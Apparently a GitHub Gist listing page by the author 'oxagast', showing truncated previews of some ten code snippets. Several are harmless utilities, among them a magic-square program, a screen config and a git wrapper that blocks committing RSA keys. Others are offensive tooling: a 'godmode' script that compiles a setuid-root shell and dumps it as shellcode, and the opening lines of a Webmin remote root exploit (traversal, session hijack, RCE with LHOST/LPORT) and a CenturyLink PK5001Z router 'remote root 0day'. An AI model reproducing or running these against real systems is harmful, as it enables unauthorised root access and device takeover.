This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "stdio.h" | |
#include "string.h" | |
void test_op(unsigned char was, unsigned char expected) { | |
printf("%c", was); | |
} | |
int main(int argc, char *argv[]) { | |
if ((argc > 1) && (argc < 3)) { | |
char ui[10]; | |
for (int uia=0; uia<6; uia++) { | |
ui[uia] = argv[1][uia]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
echo AAAABCCCC | perl -e '$change = $ARGV[1]; $findme = $ARGV[0]; $let = <STDIN>; $hex = unpack("H*", $let); $reg = qr/$findme/; if ($hex =~ s/(.*)${reg}(.*)/\1$change\2/){$newhex = pack("H*", $hex);} print $newhex;' 414243 444546 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// __ _ _ __ ___ __ ____ ____ | |
// / ( \/ )/ _\ / __)/ _\/ ___(_ _) | |
// ( O ) (/ ( (_ / \___ \ )( | |
// \__(_/\_\_/\_/\___\_/\_(____/(__) | |
// magic square | |
#include <algorithm> | |
#include <cstdlib> | |
#include <cstring> | |
#include <iostream> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### godmode by oxagast ### | |
echo '#include <unistd.h>' > sc.c; | |
echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c; | |
gcc sc.c -o godmode; | |
SHELLCODE=$(objdump --show-raw-insn -d godmode | grep -v "file format" | cut -f 2 -d ':' | cut -c -21 | cut -c 2- | sed -e 's/ /\n/g' | grep -v "^$" | sed -e 's/^/\\x/' | tr -d "\n") | |
echo -n "char shellcode[] = " | |
echo $SHELLCODE | sed -e 's/\(.\{60\}\)/\1\n/' | head -n 1 > s.tmp; echo $SHELLCODE | sed -e 's/^\n//' | sed -e 's/\(.\{80\}\)/\1\n/g' | sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp | sed -e 's/^\\/"\\/' -e 's/$/\"/' | head -c -1 | |
echo ";"; | |
rm sc.c godmode; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rm page_part 2>/dev/null; | |
arp | sed -e 's/.*ether[[:space:]]*//' -e 's/ C.*//' | grep : | xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} | grep Vendor -A 1 | grep google > page_part; | |
cat page_part | cut -d '=' -f 5 | cut -d '"' -f 1 > macs_resolved && arp -n | arp -n | cut -f 1 -d ' ' > ips_tomac; | |
tail -n $(echo `cat ips_tomac | wc -l`-1 | bc) ips_tomac > ips_tomac2; | |
cat ips_tomac2 -n | tee resolved && cat macs_resolved -n | tee -a resolved; | |
rm ips_tomac ips_tomac2 macs_resolved page_part |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# alias "git"='~/.git_check_rsa.sh' | |
if [ "$(find . -type f 2>/dev/null | xargs head -n 1 2>/dev/null | grep 'BEGIN RSA' | head -n 1 2>/dev/null)" == "-----BEGIN RSA PRIVATE KEY-----" ]; then | |
echo RSA KEY FOUND!; | |
echo Not adding to git.; | |
exit 1; | |
else | |
git $@ | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REPO=ansvif; GITUSER=oxagast; curl -s https://api.github.com/repos/$GITUSER/$REPO/releases | grep download_count | sed -e 's/.*: //' -e 's/,/ + /' | tr -d '\n' | sed -e 's/+ $/\n/' | bc | tr -d '\n' ; echo " All time clones of $REPO." |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
HOST=$1; | |
PORT=$2; | |
LHOST=$3; | |
LPORT=$4; | |
if [ $# -lt 4 ] | |
then | |
echo "Webmin <1.29 remote root exploit by oxagast" | |
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE."; | |
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!"; | |
echo "Usage:" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
startup_message off | |
#idle 1800 lockscreen | |
vbell off | |
msgwait 2 | |
defscrollback 15000 | |
defutf8 on | |
shell bash | |
shelltitle "$ |bash" | |
bind '/' eval "clear" "scrollback 0" "scrollback 15000" | |
bind = resize = |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* PK5001Z CenturyLink Router/Modem remote root exploit */ | |
/* oxagast / Marshall Whittaker */ | |
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */ | |
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */ | |
/* PK5001Z CenturyLink Router remote root 0day */ | |
/* Enjoy! */ | |
/* --oxagast */ | |
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */ | |
/* */ | |
/* # uname -a; id; */ |
OlderNewer